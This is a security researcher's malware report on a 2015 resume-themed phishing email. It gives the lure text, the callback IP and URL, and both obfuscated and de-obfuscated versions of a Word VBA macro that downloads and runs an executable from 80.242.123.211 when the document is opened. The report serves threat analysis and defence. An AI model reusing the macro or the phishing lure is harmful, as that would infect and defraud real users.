Resume Phish: Openings? 80.242.123.211

Resume Phish with VBA Macro
Reported by neonprimetime security
http://neonprimetime.blogspot.com

*****
Blogs about this:
http://neonprimetime.blogspot.com/2015/04/de-obfuscated-malicious-vba-macro.html
http://neonprimetime.blogspot.com/2015/04/resume-phish-with-vba-macro-in-word.html
*****
Callback
*****
hxxp://80.242.123.211:888/moist.exe

*****
Malwr Link
*****
https://malwr.com/analysis/NjdiMGJmMjRhMDRjNDVmZjg5ODhhYWI5NDEyZDZhM2Y/
*****

*****
Email
*****
From:   Kathy Galarneau <wilden_boner37418@yahoo.com>
Subject:    Openings?
Attachment(s):  CV_66910.doc(application/octet-stream)
Hey there,
I saw your website today Mon, 6 Apr 2015 and im really hoping there is a opening or other possibility to get a chance to prove my competence.
As you will see in my resume I have a broad experience and knowledge in this line of work and im confident it will be worth your time reading it.
I am eager to hearing from you.

Please see my CV.
In appreciation,
Kathy Galarneau

Sent from my Android Phone


*****
VBA Macro Obfuscated
*****

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If Win64 Then
Private Declare PtrSafe Function g Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal a As Long, ByVal b As String, _
ByVal b As String, ByVal d As String, ByVal e As String, _
ByVal f As Long) As Long
#Else
Private Declare Function g Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal a As Long, ByVal b As String, _
ByVal b As String, ByVal d As String, ByVal e As String, _
ByVal f As Long) As Long
#End If

Sub Document_Open()
i
End Sub

Sub i()
Dim a As String
Dim b As String
Dim c As Long
Dim d As Long
d = 0
a = l("m")
b = "xe"
a = m(a, "\df.e", b)
b = "htt" & "p://8" & "0.242.123.211:88" & "8/moist.e" & b
Dim e As MSXML2.XMLHTTP30, f As Long
Set e = New MSXML2.XMLHTTP30
e.Open "G" & "E" & "T", b, False
e.send
If e.Status = (20 * 11 - 20) Then
    f = FreeFile
    Open a For Binary As #f
    Put #f, , h(e)
    Close #f
End If
Dim x As Boolean
x = k(a, "pen")
End Sub

Function m(ByVal a As String, ByVal b As String, ByVal c As String) As String
m = a & b & c
End Function

Function l(ByVal a As String) As String
l = Environ("t" & a & "p")
End Function

Function k(ByVal a As String, ByVal b As String) As Boolean
g 0, "o" & b, a, "", vbNullString, vbNormalFocus
k = False
End Function

Function h(ByRef a As MSXML2.XMLHTTP30) As Byte()
Dim b() As Byte
b = a.responseBody
h = b
End Function


*****
VBA Macro De-Obfuscated
*****
#If Win64 Then
    Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal a As Long, ByVal b As String, _
        ByVal b As String, ByVal d As String, ByVal e As String, _
        ByVal f As Long) As Long
#Else
    Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal a As Long, ByVal b As String, _
        ByVal b As String, ByVal d As String, ByVal e As String, _
        ByVal f As Long) As Long
#End If

Sub Document_Open()
    DownloadAndExecute
End Sub

Sub DownloadAndExecute()
    Dim maliciousFileLocation = Environ("tmp\df.exe")
    Dim PayloadUrl = "http://80.242.123.211:888/moist.exe"
    Dim XMLHttpRequestObject = New MSXML2.XMLHTTP30
    XMLHttpRequestObject.Open "GET", PayloadUrl, False
    XMLHttpRequestObject.send
    If XMLHttpRequestObject.Status = 200 Then
        Dim fileId = FreeFile
        Open maliciousFileLocation For Binary As #fileId
        Put #fileId, , XMLHttpRequestObject.responseBody
        Close #fileId
    End If
    ShellExecute 0, "open", maliciousFileLocation, "", vbNullString, vbNormalFocus
End Sub